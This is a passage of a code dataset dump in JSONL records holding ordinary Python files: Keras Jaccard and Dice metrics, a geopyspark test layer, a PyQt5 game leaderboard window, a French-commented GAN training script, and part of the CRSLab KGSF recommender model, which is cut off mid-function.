SMOOTH_LOSS)\n\n return kr.backend.mean(jac)\n\ndef jaccard_coef_int(y_true, y_pred):\n y_pred_pos = kr.backend.round(kr.backend.clip(y_pred, 0, 1))\n\n intersection = kr.backend.sum(y_true * y_pred_pos, axis=[0, -1, -2])\n sum_ = kr.backend.sum(y_true + y_pred_pos, axis=[0, -1, -2])\n jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + SMOOTH_LOSS)\n return kr.backend.mean(jac)\n\ndef jaccard_coef_flat(y_true, y_pred):\n y_true_f = kr.backend.flatten(y_true)\n y_pred_f = kr.backend.flatten(y_pred)\n intersection = kr.backend.sum(y_true_f * y_pred_f)\n return (intersection + SMOOTH_LOSS) / (kr.backend.sum(y_true_f) + kr.backend.sum(y_pred_f) - intersection + SMOOTH_LOSS)\n\ndef dice_coef(y_true, y_pred, smooth=1.0):\n y_true_f = kr.backend.flatten(y_true)\n y_pred_f = kr.backend.flatten(y_pred)\n intersection = kr.backend.sum(y_true_f * y_pred_f)\n return (2. * intersection + smooth) / (kr.backend.sum(y_true_f) + kr.backend.sum(y_pred_f) + smooth)\n\ndef pct_wrong(y_true, y_pred):\n y_pred_pos = kr.backend.round(kr.backend.clip(y_pred, 0, 1))\n\n intersection = kr.backend.sum(y_true * y_pred_pos, axis=[0, -1, -2])\n sum_ = kr.backend.sum(y_true + y_pred_pos, axis=[0, -1, -2])\n jac = (intersection + SMOOTH_LOSS) / (sum_ - intersection + SMOOTH_LOSS)\n return kr.backend.mean(jac)\n","sub_path":"model_factory.py","file_name":"model_factory.py","file_ext":"py","file_size_in_byte":8542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"159200387","text":"import datetime\n\nimport numpy as np\nfrom geopyspark import geopyspark_conf\nfrom geopyspark.geotrellis import (SpaceTimeKey, Tile, _convert_to_unix_time)\nfrom geopyspark.geotrellis.constants import LayerType\nfrom geopyspark.geotrellis.layer import TiledRasterLayer\nfrom pyspark import SparkContext\n\nfrom openeogeotrellis.configparams import ConfigParams\n\n\nclass TestLayers:\n\n def __init__(self):\n master_str = \"local[*]\"\n\n conf = geopyspark_conf(master=master_str, appName=\"test\")\n conf.set('spark.kryoserializer.buffer.max', value='1G')\n conf.set('spark.ui.enabled', True)\n\n if ConfigParams().is_ci_context:\n conf.set(key='spark.driver.memory', value='2G')\n conf.set(key='spark.executor.memory', value='2G')\n\n\n self.pysc = SparkContext.getOrCreate(conf)\n\n self.first = np.zeros((1, 4, 4))\n self.first.fill(1)\n\n self.second = np.zeros((1, 4, 4))\n self.second.fill(2)\n\n self.extent = {'xmin': 0.0, 'ymin': 0.0, 'xmax': 4.0, 'ymax': 4.0}\n self.layout = {'layoutCols': 1, 'layoutRows': 1, 'tileCols': 4, 'tileRows': 4}\n\n self.now = datetime.datetime.strptime(\"2017-09-25T11:37:00Z\", '%Y-%m-%dT%H:%M:%SZ')\n\n def create_spacetime_layer(self):\n cells = np.array([self.first, self.second], dtype='int')\n tile = Tile.from_numpy_array(cells, -1)\n\n layer = [(SpaceTimeKey(0, 0, self.now), tile),\n (SpaceTimeKey(1, 0, self.now), tile),\n (SpaceTimeKey(0, 1, self.now), tile),\n (SpaceTimeKey(1, 1, self.now), tile)]\n\n rdd = self.pysc.parallelize(layer)\n\n metadata = {'cellType': 'int32ud-1',\n 'extent': self.extent,\n 'crs': '+proj=longlat +datum=WGS84 +no_defs ',\n 'bounds': {\n 'minKey': {'col': 0, 'row': 0, 'instant': _convert_to_unix_time(self.now)},\n 'maxKey': {'col': 1, 'row': 1, 'instant': _convert_to_unix_time(self.now)}\n },\n 'layoutDefinition': {\n 'extent': self.extent,\n 'tileLayout': self.layout\n }\n }\n\n return TiledRasterLayer.from_numpy_rdd(LayerType.SPACETIME, rdd, metadata)\n","sub_path":"openeogeotrellis/testlayers.py","file_name":"testlayers.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"585509756","text":"import sys\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtWidgets import *\nimport MainWindow\n\n\n# 通关挑战排行榜\nclass RankWindow(QMainWindow):\n def __init__(self):\n super().__init__()\n palette = QPalette()\n palette.setBrush(QPalette.Background, QBrush(QPixmap('bg.JPG')))\n self.setPalette(palette)\n\n self.setWindowTitle('往次得分')\n self.setWindowModality(Qt.ApplicationModal)\n self.resize(528, 530)\n self.setFixedSize(528, 530)\n self.initUI()\n\n def initUI(self):\n layout = QHBoxLayout()\n # 表格布局\n tablewidget = QTableWidget()\n tablewidget.setRowCount(10)\n tablewidget.setColumnCount(4)\n layout.addWidget(tablewidget)\n tablewidget.setHorizontalHeaderLabels(['排名', '记录日期', '通关数', '总时间(s)'])\n tablewidget.verticalHeader().setVisible(False)\n file = open('rank.txt')\n rank = []\n while True:\n line = file.readline()\n if not line:\n break\n rank.append(line)\n file.close()\n i = 0\n for item in rank:\n item = item.replace('\\n', '')\n list = item.split(' ')\n temp = QTableWidgetItem(str(i + 1))\n temp.setTextAlignment(Qt.AlignCenter)\n tablewidget.setItem(i, 0, temp)\n for j in range(3):\n # 对每一个位置,加入表格布局item\n temp = QTableWidgetItem(list[j])\n temp.setTextAlignment(Qt.AlignCenter)\n tablewidget.setItem(i, j + 1, temp)\n i = i + 1\n # 禁止编辑\n tablewidget.setEditTriggers(QAbstractItemView.NoEditTriggers)\n # 整行选择\n tablewidget.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n toolbar = self.addToolBar('返回')\n new = QAction(QIcon('home.png'), '返回', self)\n toolbar.addAction(new)\n toolbar.actionTriggered.connect(self.back)\n toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)\n\n mainframe = QWidget()\n mainframe.setLayout(layout)\n self.setCentralWidget(mainframe)\n\n self.setLayout(layout)\n\n\n def closeEvent(self, event):\n reply = QMessageBox.question(self, '退出游戏', '你确定退出游戏吗?', QMessageBox.Yes | QMessageBox.No, QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def back(self):\n self.hide()\n self.father = MainWindow.MainWindow()\n self.father.show()\n\n","sub_path":"GUI/RankWindow.py","file_name":"RankWindow.py","file_ext":"py","file_size_in_byte":2625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"234520919","text":"\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Imports #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\nimport cv2\nimport keras\nimport os\nimport numpy as np\nfrom tqdm import tqdm\nfrom glob import glob\nfrom tensorflow.keras.optimizers import Adam\nfrom keras.models import Sequential, load_model, model_from_yaml\nfrom keras.layers import Conv2D, Dense, MaxPooling2D, Flatten, Reshape, UpSampling2D, SpatialDropout2D\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# CHARGER + PREPARER IMAGE REELLES DATA #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\noptimizer = Adam(lr=0.0002, beta_1=0.5)\n\nimages_vraies =[]\n\nnoms_image = glob(\"dataSet/*\")\n\nfor nom in tqdm(noms_image):\n\timage = cv2.imread(nom, cv2.IMREAD_COLOR)\n\timage = cv2.resize(image, (256,256))\n\timage = image.astype(\"float32\")\t\n\timage = (image-127.5)/127.5\n\timages_vraies.append(image)\n\nimages_vraies = np.array(images_vraies)\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer Discriminateur #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ndiscriminateur = Sequential()\n\ndiscriminateur.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(256,256,3))) #Changer les dimensions de l'image ici\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(32, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(64, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(SpatialDropout2D(0.14))\n\ndiscriminateur.add(Conv2D(128, kernel_size=(3, 3), activation='relu' ))\ndiscriminateur.add(MaxPooling2D(pool_size=(2, 2)))\n\ndiscriminateur.add(Flatten())\n\ndiscriminateur.add(Dense(128, activation = \"relu\" ))\ndiscriminateur.add(Dense(1, activation = \"sigmoid\" ))\n\ndiscriminateur.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','w') as log:\n discriminateur.summary(print_fn=lambda x: log.write(x + '\\n'))\n log.writelines([\"\\n\\n\"])\n log.writelines([\"#######################################################################\\n\"])\n log.writelines([\"#######################################################################\\n\\n\\n\"])\n\ndiscriminateur.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer Générateur #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ngenerateur = Sequential()\n\ngenerateur.add(Dense(16*16*256, activation='relu' , input_shape=(100,)))\ngenerateur.add(Reshape((16, 16, 256))) # 16x16\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 16x16 -> 32x32\ngenerateur.add(Conv2D(128, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 32x32 -> 64x64\ngenerateur.add(Conv2D(64, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 64x64 -> 128x128\ngenerateur.add(Conv2D(32, kernel_size=3, padding='same', activation='relu'))\n\ngenerateur.add(UpSampling2D(size=(2, 2))) # 128x128 -> 256x256\ngenerateur.add(Conv2D(16, kernel_size=3, padding='same', activation='relu'))\n\n#generateur.add(UpSampling2D(size=(2, 2))) # 256x256 -> 512x512\n#generateur.add(Conv2D(8, kernel_size=3, padding='same', activation='relu'))\n\n\ngenerateur.add(Conv2D(3, kernel_size=(2, 2),padding='same', activation='tanh' ))\ngenerateur.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','a') as log:\n generateur.summary(print_fn=lambda x: log.write(x + '\\n'))\n log.writelines([\"\\n\\n\"])\n log.writelines([\"#######################################################################\\n\"])\n log.writelines([\"#######################################################################\\n\\n\\n\"]) \n#On n'entraine pas le générateur tout seul du coup on ne le compile pas\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Créer COMBO #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\ncombo = Sequential()\ncombo.add(generateur)\ncombo.add(discriminateur)\n\ndiscriminateur.trainable = False\ncombo.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\ncombo.summary()\n\n#Sauvegarde de l'architecture du model dans log.txt :\nwith open('log.txt','a') as log:\n combo.summary(print_fn=lambda x: log.write(x + '\\n'))\n\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n# Entrainer #\n#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\niterations = 200000\ndemi_batch= 16\n\n#plusieurs itération\nfor iteration in range(iterations):\n\tos.system('cls' if os.name == 'nt' else 'clear')# Clean la console à chaque boucle\n\tprint()\n\tprint(\" ##########################\")\n\tprint(\" Boucle n°\"+str(iteration)+\"/\"+str(iterations))\n\tprint(\" ##########################\")\n\t################################################\n\t# créer pack de données pour le discriminateur #\n\t################################################\n\n\t# etape 1 : prendre des bonnes images\n\t# etape 2 : créer les labels (1 pour vrai) pour les bonnes images du dataset\n\t# etape 3 : generer des mauvaises images\n\t# etape 4 : créer les labels (0 pour faux) pour les mauvaises images générés\n\n\tx = []\n\ty = []\n\n\t# etape 1 : prendre des bonnes images\n\timages_bonnes = images_vraies[np.random.randint(0, images_vraies.shape[0], size=demi_batch)]\n\t# etape 2 : créer les labels (1 pour vrai) pour les bonnes images du dataset\n\tlabels_bonnes = np.ones(demi_batch) #un tableau avec 1000 fois le label 1\n\t# etape 3 : generer des mauvaises images\n\tbruit = np.random.normal(0, 1, size=[demi_batch,100]) # 1000 tableaux de 100 nombres aléatoires\n\timages_mauvaises = generateur.predict(bruit) # milles images générées\n\t# etape 4 : créer les labels (0 pour faux) pour les mauvaises images générés\n\tlabels_mauvaises = np.zeros(demi_batch)\n\n\tx = np.concatenate([images_bonnes,images_mauvaises])\n\ty = np.concatenate([labels_bonnes,labels_mauvaises])\n\n\t############################\n\t# entrainer discriminateur #\n\t############################\n\n\tdiscriminateur.trainable = True\n\tprint()\n\tprint(\"Entrainement du discriminateur :\")\n\tprint()\n\tdiscriminateur.fit(x,y, epochs = 1, batch_size=32)\n\n\n\t#######################################\n\t# créer pack de données pour le combo #\n\t#######################################\n\n\t# generer du bruit\n\tbruit = np.random.normal(0, 1, size=[demi_batch,100]) # 1000 tableaux de 100 nombres aléatoires\n\t# créer les labels 1\n\tlabels_combo = np.ones(demi_batch)\n\n\n\t###################\n\t# entrainer combo #\n\t###################\n\tprint()\n\tprint(\"Entrainement du Générateur :\")\n\tprint()\n\tdiscriminateur.trainable = False\n\tcombo.fit(bruit,labels_combo, epochs=1, batch_size=32)\n\n\t######################################\n\t# Généreration d'image et sauvegarde #\n\t######################################\n\tif iteration % 25 == 0 :\n\t\tbruit = np.random.normal(0, 1, size=[1, 100])\n\t\tprint(\"Génération d'image...\")\n\t\tprint()\n\t\timage = generateur.predict(bruit)\n\t\timage = (image*127.5)+127.5\n\t\timage = image.astype(\"uint8\")\n\t\timage = image.reshape((256,256,3))\n\t\timname = \"genim_\"+str(iteration)+\".png\"\n\t\tcv2.imwrite(\"Images/\" +imname, image)\n\n\n\t#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n\t# Sauvegarde des Models toutes les 100 boucles #\n\t#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#\n\tif iteration % 500 == 0 and iteration != 0 :\n\t\tprint()\n\t\tprint(\"Sauvegarde des models...\")\n\t\tprint()\n\t\tdiscriminateur.save(\"Discriminateurs/discriminateur_epoch\"+str(iteration)+\".h5\")\n\t\tgenerateur.save(\"Generateurs/generateur_epoch\"+str(iteration)+\".h5\")\n","sub_path":"GAN/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"466185615","text":"# @Time : 2020/11/22\n# @Author : Kun Zhou\n# @Email : francis_kun_zhou@163.com\n\n# UPDATE:\n# @Time : 2020/11/24, 2020/12/29, 2021/1/4\n# @Author : Kun Zhou, Xiaolei Wang, Yuanhang Zhou\n# @Email : francis_kun_zhou@163.com, wxl1999@foxmail.com, sdzyh002@gmail.com\n\nr\"\"\"\nKGSF\n====\nReferences:\n Zhou, Kun, et al. `\"Improving Conversational Recommender Systems via Knowledge Graph based Semantic Fusion.\"`_ in KDD 2020.\n\n.. _`\"Improving Conversational Recommender Systems via Knowledge Graph based Semantic Fusion.\"`:\n https://dl.acm.org/doi/abs/10.1145/3394486.3403143\n\n\"\"\"\n\nimport os\n\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom loguru import logger\nfrom torch import nn\nfrom torch_geometric.nn import GCNConv, RGCNConv\n\nfrom crslab.model.base import BaseModel\nfrom crslab.model.utils.functions import edge_to_pyg_format\nfrom crslab.model.utils.modules.attention import SelfAttentionSeq\nfrom crslab.model.utils.modules.transformer import TransformerEncoder\nfrom crslab.utils.download import DownloadableFile\nfrom crslab.model.utils.modules.transformer import MultiHeadAttention, TransformerFFN, _create_selfattn_mask, \\\n _normalize, \\\n create_position_codes\nfrom crslab.utils import ModelType\n\nresources = {\n 'ReDial': {\n 'version': '0.2',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EXl2bhU82O5Itp9K4Mh41mYB69BKPEvMcKwZRstfYZUB1g?download=1',\n 'kgsf_redial.zip',\n 'f627841644a184079acde1b0185e3a223945061c3a591f4bc0d7f62e7263f548',\n ),\n },\n 'TGReDial': {\n 'version': '0.2',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/ETzJ0-QnguRKiKO_ktrTDZQBZHKom4-V5SJ9mhesfXzrWQ?download=1',\n 'kgsf_tgredial.zip',\n 'c9d054b653808795035f77cb783227e6e9a938e5bedca4d7f88c6dfb539be5d1',\n ),\n },\n 'GoRecDial': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EUfPcGfLHAJPj-F3Mr79CF4Bc5sZXKk-jysutrjiRcQvCg?download=1',\n 'kgsf_gorecdial.zip',\n '9794abf12b5d6773d867556685da14d951d42f64a5c4781af7d6fb720e87ec4f',\n )\n },\n 'OpenDialKG': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EQgebOKypMlPr18KJ6uGeDABtqTbMQYVYNWNR_DaAZ1Wvg?download=1',\n 'kgsf_opendialkg.zip',\n '89b785b23478b1d91d6ab4f34a3658e82b52dcbb73828713a9b369fa49db9e61'\n )\n },\n 'Inspired': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/EXQGUxjGQ-ZKpzTnUYOMavABMUAxb0JwkiIMAPp5DIvsNw?download=1',\n 'kgsf_inspired.zip',\n '23dfc031a3c71f2a52e29fe0183e1a501771b8d431852102ba6fd83d971f928d'\n )\n },\n 'DuRecDial': {\n 'version': '0.1',\n 'file': DownloadableFile(\n 'https://pkueducn-my.sharepoint.com/:u:/g/personal/franciszhou_pku_edu_cn/Ed9-qLkK0bNCk5AAvJpWU3cBC-cXks-6JlclYp08AFovyw?download=1',\n 'kgsf_durecdial.zip',\n 'f9a39c2382efe88d80ef14d7db8b4cbaf3a6eb92a33e018dfc9afba546ba08ef'\n )\n }\n}\n\n\nclass KGSFModel(BaseModel):\n \"\"\"\n\n Attributes:\n vocab_size: A integer indicating the vocabulary size.\n pad_token_idx: A integer indicating the id of padding token.\n start_token_idx: A integer indicating the id of start token.\n end_token_idx: A integer indicating the id of end token.\n token_emb_dim: A integer indicating the dimension of token embedding layer.\n pretrain_embedding: A string indicating the path of pretrained embedding.\n n_word: A integer indicating the number of words.\n n_entity: A integer indicating the number of entities.\n pad_word_idx: A integer indicating the id of word padding.\n pad_entity_idx: A integer indicating the id of entity padding.\n num_bases: A integer indicating the number of bases.\n kg_emb_dim: A integer indicating the dimension of kg embedding.\n n_heads: A integer indicating the number of heads.\n n_layers: A integer indicating the number of layer.\n ffn_size: A integer indicating the size of ffn hidden.\n dropout: A float indicating the dropout rate.\n attention_dropout: A integer indicating the dropout rate of attention layer.\n relu_dropout: A integer indicating the dropout rate of relu layer.\n learn_positional_embeddings: A boolean indicating if we learn the positional embedding.\n embeddings_scale: A boolean indicating if we use the embeddings scale.\n reduction: A boolean indicating if we use the reduction.\n n_positions: A integer indicating the number of position.\n response_truncate = A integer indicating the longest length for response generation.\n pretrained_embedding: A string indicating the path of pretrained embedding.\n\n \"\"\"\n model_type = ModelType.GENERATION\n\n def __init__(self, opt, device, other_data):\n \"\"\"\n\n Args:\n opt (Config or dict): A dictionary record the hyper parameters.\n device (torch.device): A variable indicating which device to place the data and model.\n other_data (dict): A dictionary record the other data.\n\n \"\"\"\n self.device = device\n self.gpu = opt.get(\"gpu\", [-1])\n # vocab\n self.vocab_size = other_data['vocab']['vocab_size']\n self.pad_token_idx = other_data['vocab']['pad']\n self.start_token_idx = other_data['vocab']['start']\n self.end_token_idx = other_data['vocab']['end']\n self.token_emb_dim = opt['token_emb_dim']\n self.pretrained_embedding = other_data.get('embedding', None)\n # kg\n self.n_word = other_data['vocab']['n_word']\n self.n_entity = other_data['vocab']['n_entity']\n self.pad_word_idx = other_data['vocab']['pad_word']\n self.pad_entity_idx = other_data['vocab']['pad_entity']\n entity_kg = other_data['entity_kg']\n self.n_relation = entity_kg['n_relation']\n entity_edges = entity_kg['edge']\n self.entity_edge_idx, self.entity_edge_type = edge_to_pyg_format(entity_edges, 'RGCN')\n self.entity_edge_idx = self.entity_edge_idx.to(device)\n self.entity_edge_type = self.entity_edge_type.to(device)\n word_edges = other_data['word_kg']['edge']\n\n self.word_edges = edge_to_pyg_format(word_edges, 'GCN').to(device)\n\n self.num_bases = opt['num_bases']\n self.kg_emb_dim = opt['kg_emb_dim']\n # transformer\n self.n_heads = opt['n_heads']\n self.n_layers = opt['n_layers']\n self.ffn_size = opt['ffn_size']\n self.dropout = opt['dropout']\n self.attention_dropout = opt['attention_dropout']\n self.relu_dropout = opt['relu_dropout']\n self.learn_positional_embeddings = opt['learn_positional_embeddings']\n self.embeddings_scale = opt['embeddings_scale']\n self.reduction = opt['reduction']\n self.n_positions = opt['n_positions']\n self.response_truncate = opt.get('response_truncate', 20)\n # copy mask\n dataset = opt['dataset']\n dpath = os.path.join(opt.model_path, \"kgsf\", dataset)\n resource = resources[dataset]\n super(KGSFModel, self).__init__(opt, device, dpath, resource)\n\n def build_model(self):\n self._init_embeddings()\n self._build_kg_layer()\n self._build_infomax_layer()\n self._build_recommendation_layer()\n self._build_conversation_layer()\n\n def _init_embeddings(self):\n if self.pretrained_embedding is not None:\n self.token_embedding = nn.Embedding.from_pretrained(\n torch.as_tensor(self.pretrained_embedding, dtype=torch.float), freeze=False,\n padding_idx=self.pad_token_idx)\n else:\n self.token_embedding = nn.Embedding(self.vocab_size, self.token_emb_dim, self.pad_token_idx)\n nn.init.normal_(self.token_embedding.weight, mean=0, std=self.kg_emb_dim ** -0.5)\n nn.init.constant_(self.token_embedding.weight[self.pad_token_idx], 0)\n\n self.word_kg_embedding = nn.Embedding(self.n_word, self.kg_emb_dim, self.pad_word_idx)\n nn.init.normal_(self.word_kg_embedding.weight, mean=0, std=self.kg_emb_dim ** -0.5)\n nn.init.constant_(self.word_kg_embedding.weight[self.pad_word_idx], 0)\n\n logger.debug('[Finish init embeddings]')\n\n def _build_kg_layer(self):\n # db encoder\n self.entity_encoder = RGCNConv(self.n_entity, self.kg_emb_dim, self.n_relation, self.num_bases)\n self.entity_self_attn = SelfAttentionSeq(self.kg_emb_dim, self.kg_emb_dim)\n\n # concept encoder\n self.word_encoder = GCNConv(self.kg_emb_dim, self.kg_emb_dim)\n self.word_self_attn = SelfAttentionSeq(self.kg_emb_dim, self.kg_emb_dim)\n\n # gate mechanism\n self.gate_layer = GateLayer(self.kg_emb_dim)\n\n logger.debug('[Finish build kg layer]')\n\n def _build_infomax_layer(self):\n self.infomax_norm = nn.Linear(self.kg_emb_dim, self.kg_emb_dim)\n self.infomax_bias = nn.Linear(self.kg_emb_dim, self.n_entity)\n self.infomax_loss = nn.MSELoss(reduction='sum')\n\n logger.debug('[Finish build infomax layer]')\n\n def _build_recommendation_layer(self):\n self.rec_bias = nn.Linear(self.kg_emb_dim, self.n_entity)\n self.rec_loss = nn.CrossEntropyLoss()\n\n logger.debug('[Finish build rec layer]')\n\n def _build_conversation_layer(self):\n self.register_buffer('START', torch.tensor([self.start_token_idx], dtype=torch.long))\n self.conv_encoder = TransformerEncoder(\n n_heads=self.n_heads,\n n_layers=self.n_layers,\n embedding_size=self.token_emb_dim,\n ffn_size=self.ffn_size,\n vocabulary_size=self.vocab_size,\n embedding=self.token_embedding,\n dropout=self.dropout,\n attention_dropout=self.attention_dropout,\n relu_dropout=self.relu_dropout,\n padding_idx=self.pad_token_idx,\n learn_positional_embeddings=self.learn_positional_embeddings,\n embeddings_scale=self.embeddings_scale,\n reduction=self.reduction,\n n_positions=self.n_positions,\n )\n\n self.conv_entity_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_entity_attn_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_word_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n self.conv_word_attn_norm = nn.Linear(self.kg_emb_dim, self.ffn_size)\n\n self.copy_norm = nn.Linear(self.ffn_size * 3, self.token_emb_dim)\n self.copy_output = nn.Linear(self.token_emb_dim, self.vocab_size)\n self.copy_mask = torch.as_tensor(np.load(os.path.join(self.dpath, \"copy_mask.npy\")).astype(bool),\n ).to(self.device)\n\n self.conv_decoder = TransformerDecoderKG(\n self.n_heads, self.n_layers, self.token_emb_dim, self.ffn_size, self.vocab_size,\n embedding=self.token_embedding,\n dropout=self.dropout,\n attention_dropout=self.attention_dropout,\n relu_dropout=self.relu_dropout,\n embeddings_scale=self.embeddings_scale,\n learn_positional_embeddings=self.learn_positional_embeddings,\n padding_idx=self.pad_token_idx,\n n_positions=self.n_positions\n )\n self.conv_loss = nn.CrossEntropyLoss(ignore_index=self.pad_token_idx)\n\n logger.debug('[Finish build conv layer]')\n\n def pretrain_infomax(self, batch):\n \"\"\"\n words: (batch_size, word_length)\n entity_labels: (batch_size, n_entity)\n \"\"\"\n words, entity_labels = batch\n\n loss_mask = torch.sum(entity_labels)\n if loss_mask.item() == 0:\n return None\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n word_representations = word_graph_representations[words]\n word_padding_mask = words.eq(self.pad_word_idx) # (bs, seq_len)\n\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n word_info_rep = self.infomax_norm(word_attn_rep) # (bs, dim)\n info_predict = F.linear(word_info_rep, entity_graph_representations, self.infomax_bias.bias) # (bs, #entity)\n loss = self.infomax_loss(info_predict, entity_labels) / loss_mask\n return loss\n\n def recommend(self, batch, mode):\n \"\"\"\n context_entities: (batch_size, entity_length)\n context_words: (batch_size, word_length)\n movie: (batch_size)\n \"\"\"\n context_entities, context_words, entities, movie = batch\n\n entity_graph_representations = self.entity_encoder(None, self.entity_edge_idx, self.entity_edge_type)\n word_graph_representations = self.word_encoder(self.word_kg_embedding.weight, self.word_edges)\n\n entity_padding_mask = context_entities.eq(self.pad_entity_idx) # (bs, entity_len)\n word_padding_mask = context_words.eq(self.pad_word_idx) # (bs, word_len)\n\n entity_representations = entity_graph_representations[context_entities]\n word_representations = word_graph_representations[context_words]\n\n entity_attn_rep = self.entity_self_attn(entity_representations, entity_padding_mask)\n word_attn_rep = self.word_self_attn(word_representations, word_padding_mask)\n\n user_rep = self.gate_layer(entity_attn_rep, word_attn_rep)\n rec_scores = F.linear(user_rep, entity_graph_representations, self.rec_bias.bias) # (bs, #entity)\n\n rec_loss = self.rec_loss(rec_scores, movie)\n\n info_loss_mask = torch.sum(entities)\n if info_loss_mask.item() == 0:\n info_loss = None\n else:\n word_info_rep = self.infomax_norm(word_attn_rep) # (bs, dim)\n info_predict = F.linear(word_info_rep, entity_graph_representations,\n self.infomax_bias.bias) # (bs, #entity)\n info_loss = self.infomax_loss(info_predict, entities) / info_loss_mask\n\n return rec_loss, info_loss, rec_scores\n\n def freeze_parameters(self):\n freeze_models = [self.word_kg_embedding, self.entity_encoder, self.entity_self_attn, self.word_encoder,\n self.word_self_attn, self.gate_layer, self.infomax_bias, self.infomax_norm, self.rec_bias]\n for model in freeze_models:\n for p in model.parameters():\n p.requires_grad = False\n\n def _starts(self, batch_size):\n \"\"\"Return bsz start tokens.\"\"\"\n return self.START.detach().expand(batch_size, 1)\n\n def _decode_forced_with_kg(self, token_encoding, entity_reps, entity_emb_attn, entity_mask,\n word_reps, word_emb_attn, word_mask, response):\n batch_size, seq_len = response.shape\n start = self._starts(batch_size)\n inputs = torch.cat((start, response[:, :-1]), dim=-1).long()\n\n dialog_latent, _ = self.conv_decoder(inputs, token_encoding, word_reps, word_mask,\n entity_reps, entity_mask) # (bs, seq_len, dim)\n entity_latent = entity_emb_attn.unsqueeze(1).expand(-1, seq_len, -1)\n word_latent = word_emb_attn.unsqueeze(1).expand(-1, seq_len, -1)\n copy_latent = self.copy_norm(\n torch.cat((entity_latent, word_latent, dialog_latent), dim=-1)) # (bs, seq_len, dim)\n\n copy_logits = self.copy_output(copy_latent) * self.copy_mask.unsqueeze(0).unsqueeze(\n 0) # (bs, seq_len, vocab_size)\n gen_logits = F.linear(dialog_latent, self.token_embedding.weight) # (bs, seq_len, vocab_size)\n sum_logits = copy_logits + gen_logits\n preds = sum_logits.argmax(dim=-1)\n return 